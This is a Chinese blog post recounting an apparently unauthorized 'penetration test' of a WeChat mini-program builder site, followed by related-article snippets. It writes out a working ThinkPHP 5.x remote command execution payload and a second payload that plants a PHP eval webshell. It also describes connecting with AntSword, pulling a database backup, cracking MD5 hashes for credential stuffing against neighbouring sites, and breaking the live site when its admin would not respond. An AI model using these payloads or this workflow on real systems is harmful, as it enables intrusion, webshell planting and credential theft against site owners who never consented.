一次日歪了的渗透测试
作者:贝米少年
一次日歪了的渗透测试
目标站: 某微信小程序diy平台
https://scan.dyboy.cn/web/webside tscan
找到一个thinkphp的站
想办法报个错看看版本 5.0.10
这个版本好多洞 尝试 ThinkPHP 5.x 远程命令执行漏洞
参考文章:https://blog.csdn.net/u010433704/article/details/103258291
就是程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
Payload:public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写shell
public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=…/test.php&vars[1][]=<?php @eval($_POST['shell']);?>
蚁剑连接
发现个问题 好像日歪了 ip不对阿 发现一个数据库备份
md5解密去撞库 因为是他个人的qq号所以就打码了
其实到现在就开始出现了问题 因为主站那个后台我进去了之后查看功能的时候点了一下编译 大概是站点死循环了 联系管理员也不理 这就很尴尬了
通过https://ipchaxun.com/找到了几个旁站
访问/readme.html发现一个是wordpress的站 撞库失败
使用wpscan扫描一下 kali自带
sudo wpscan -url xxx.com --api-token
没有发现漏洞 版本是5.7.2 最新版本
| - server: nginx/1.19.10
| - x-powered-by: PHP/7.4.19
wp这个版本太高了没办法拿下
其实好多无关紧要的都没有写 wp的xss 还有好几个小网站的撞库 尽量赶在周一前把剩下的写完
等主站能打开了再写后续 又水一篇…
一次日歪了的渗透测试相关推荐
- 小白入坑 Web 渗透测试必备指南
小白如何快速入门 由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我.再者,内容不会完全讲清楚,因为本身话题的原因,部分会一笔带过. 小白该如何踏入 Web 安全这个坑呢?我的经 ...
- 查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试
在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...
- 渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别
2019独角兽企业重金招聘Python工程师标准>>> 渗透测试是正义黑客大展身手的地方.他们可以对漏洞评估中识别出的许多漏洞进行测试,以量化该漏洞带来的实际威胁和风险. 当正义黑客 ...
- 渗透测试是否需要学习Linux
渗透测试是一种利用模拟黑客攻击的手段,来评估生产系统的安全性能,用黑客惯用的破坏攻击方式,行的却是维护安全之事,也就是大家所说的白帽黑客.白帽黑客通常受雇于各大公司,是维护网络与计算机安全的主要力量. ...
- 暗渡陈仓:用低消耗设备进行破解和渗透测试1.2.2 渗透测试工具集
1.2.2 渗透测试工具集 Deck包含大量的渗透测试工具.设计理念是每个可能会用到的工具都应该包含进来,以确保在使用时无须下载额外的软件包.在渗透测试行动中给攻击机安装新的软件包很困难,轻则要费很大 ...
- 电网机巡智能管控平台渗透测试经历
目录 前言 渗透测试 概念 分类 手段 安全漏洞的影响 安全漏洞与BUG的关系 渗透测试的流程 明确目标 信息收集 漏洞扫描 漏洞利用 权限提升 痕迹清理 信息整理 分析报告及修复方案 前言 电网集训 ...
- 渗透测试与自动化安全测试工具比较
应用程序安全性并不新鲜,但它在需求.复杂性和深度方面正迅速增长.随着网络犯罪自疫情爆发以来增长了近600%,越来越多的SaaS企业开始争相保护他们的应用程序.即使那些运行最新端点保护的系统也面临重大漏 ...
- 《树莓派渗透测试实战》——2.7 设置SSH服务
本节书摘来自异步社区<树莓派渗透测试实战>一书中的第2章,第2.7节,作者[美]Joseph Muniz(约瑟夫 穆尼斯),Aamir Lakhani(阿米尔 拉克哈尼),朱筱丹 译,更多 ...
- 【渗透测试学习平台】 web for pentester -1.介绍与安装
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址: ...
最新文章
- 计算机书籍-老年人编程自学书籍
- 移动端实现复制到剪贴板
- 【控制】《多无人机协同控制技术》周伟老师-第7章-基于多模型预测控制的无人机编队运动控制策略
- Ubuntu下对双显卡的支持问题
- 【ASP.NET Core】给路由规则命名有何用处
- 关于数据库主键和外键
- python文件备份_基于 Python 的文件备份
- php控制器的作用,控制器定义 · ThinkPHP5.0完全开发手册 · 看云
- python支付程序源码_支付宝推出新活动,Python脚本能让你赚的更多!(附源码)...
- PHP-----文件系统的交互
- Problem D: 平面划分
- 《CCNA网络技术学习指南》-命令版
- sql安装过程中,为 SQL Server 代理服务提供的凭据无效。若要继续操作,请为 SQL
- HtmlHelper用法大全(上)
- Android 彻底杀死当前进程
- [洛谷]P1978 集合 (#数学 -1.3)(#STL -1.1)
- 【国内SEO大牛】网站统计显示被违禁词搜索进来原因
- 名创优品通过上市聆讯:寻求双重主要上市 年营收91亿
- Python取多维数组第n维的前几位
- android TextView 分散对齐(两端对齐)